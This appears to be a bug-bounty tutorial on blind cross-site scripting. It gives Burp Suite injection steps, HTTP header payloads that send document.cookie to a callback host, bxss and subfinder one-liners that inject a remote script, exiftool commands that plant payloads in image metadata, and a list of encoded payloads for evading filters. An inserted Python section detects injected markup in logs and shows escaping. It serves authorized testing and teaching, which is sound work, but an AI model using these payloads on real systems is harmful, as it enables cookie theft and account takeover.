Advanced techniques for stealthy cross-site scripting attacks
Blind XSS (BXSS) is a stealthy form of cross-site scripting where payloads are stored in places you can't see immediately, such as logs, admin panels, email templates, file metadata and other backend systems, and only execute later when those systems render the data. Because there's no instant feedback, it requires specialized tools and techniques.
Before hunting for Blind XSS, you need the right toolset configured and ready.
The first step in any hunt is finding the right targets. Use custom dorks to locate various submission forms across the web that may be vulnerable to Blind XSS.
Before injecting payloads, you need a system to generate them and listen for their callbacks. This involves a Blind XSS server and a payload manager.
Use Burp Suite's Match and Replace feature to automatically inject Blind XSS payloads into every request you make.
1. Navigate to Proxy > Settings > Match and Replace.
2. Click 'Add' to create a new rule.
3. Set the rule to replace User-Agent with your payload.

These are example HTTP request headers with Blind XSS payloads. Replace YOUR-COLLAB.DOMAIN with your actual callback server.
User-Agent: <script src="https://YOUR-COLLAB.DOMAIN"></script>
Referer: https://YOUR-COLLAB.DOMAIN/?r=ref
X-Forwarded-For: 127.0.0.1, https://YOUR-COLLAB.DOMAIN/
X-Api-Version: <svg onload="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie"></svg>
Cookie: session=abc; extra=<img src=x onerror="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie">

For manual testing, use a User-Agent switcher browser extension to quickly inject payloads while browsing.
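From the defender's side, header-borne payloads like the ones above only fire when a log viewer or admin panel later renders those fields as HTML. The following is an added example, not code from the original post: it scans constructed access-log records for injected markup (a triage signal for stored payloads) and shows the output encoding that stops them executing when displayed. The record fields and sample values are assumptions.

```python
import html
import re

# Constructed sample of access-log records that an admin panel might later render.
SAMPLE_LOG = [
    {"ip": "203.0.113.7", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "referer": "https://example.org/"},
    {"ip": "203.0.113.8", "user_agent": '<script src="https://collab.example"></script>',
     "referer": "-"},
    {"ip": "203.0.113.9", "user_agent": "curl/8.4.0",
     "referer": '"><img src=x onerror="fetch(\'https://collab.example/?c=\'+document.cookie)">'},
]

# Markers typical of markup injected into free-text header fields; case-insensitive.
# This is a detection heuristic for triage, not a substitute for output encoding.
INJECTION_PATTERNS = [
    re.compile(r"<\s*(script|svg|img|iframe|body|object|embed)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),          # inline event handlers (onload=, onerror=)
    re.compile(r"javascript\s*:", re.I),          # javascript: URLs
    re.compile(r"%3C|&lt;|&#x3c;|&#60;", re.I),   # URL- or HTML-encoded '<'
]


def suspicious_fields(record):
    """Return the names of fields whose value carries XSS-style markup."""
    return [k for k, v in record.items()
            if isinstance(v, str) and any(p.search(v) for p in INJECTION_PATTERNS)]


def scan_log(records):
    """Return (index, flagged_fields) for every record carrying injected markup."""
    hits = []
    for i, rec in enumerate(records):
        fields = suspicious_fields(rec)
        if fields:
            hits.append((i, fields))
    return hits


def render_row(record):
    """Build one HTML table row, escaping every value so stored payloads render as text."""
    cells = "".join(f"<td>{html.escape(v, quote=True)}</td>" for v in record.values())
    return f"<tr>{cells}</tr>"


if __name__ == "__main__":
    for idx, fields in scan_log(SAMPLE_LOG):
        print(f"record {idx}: injected markup in {fields}")
    print(render_row(SAMPLE_LOG[1]))
```

The escaped row is what a log viewer should emit; an unescaped template in the same place is exactly the sink that makes the payloads above fire.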
Use one-liner tools and scripts to scale your Blind XSS testing across many targets automatically.
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
subfinder -d vulnweb.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
subfinder -d vulnweb.com | gau | bxss -payload '"><script src=https://xss.report/c/coffinxp></script>' -header "X-Forwarded-For"

A clever technique is embedding XSS payloads in image metadata. When the application displays the metadata, your payload executes.
exiftool -Comment='"><img src=x onerror=alert(1)>' test.jpg
exiftool -Title='"><script src=https://YOUR-COLLAB.DOMAIN></script>' test.jpg
exiftool -Subject='"><svg onload=alert(1)>' test.jpg

For highly secured targets with strong input filtering, use encoded payloads. Create a single HTML file with dozens of payloads, each encoded differently (double URL encoding, triple URL encoding, HTML entities, etc.).
"><script src=https://YOUR-COLLAB.DOMAIN></script>
'"><img src=x onerror=this.src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie>
<svg/onload="fetch('https://YOUR-COLLAB.DOMAIN/?c='+document.cookie)">
javascript:eval(atob('BASE64_ENCODED_PAYLOAD'))
%22%3E%3Cscript%20src%3Dhttps%3A%2F%2FYOUR-COLLAB.DOMAIN%3E%3C%2Fscript%3E
%25%32%32%25%33%45%25%33%43%73%63%72%69%70%74...

Blind XSS isn't for the impatient, but it's one of the most rewarding vulnerabilities. Be everywhere: automate payloads in headers with Burp or a User-Agent switcher, scale with one-liners that crawl targets, and never underestimate hidden payloads in image EXIF data. Every technique here is a tool to ensure no input goes untested. Build a robust methodology, think creatively, and let the backend do the work for you.
For educational and authorized testing purposes only. Always obtain proper authorization before testing.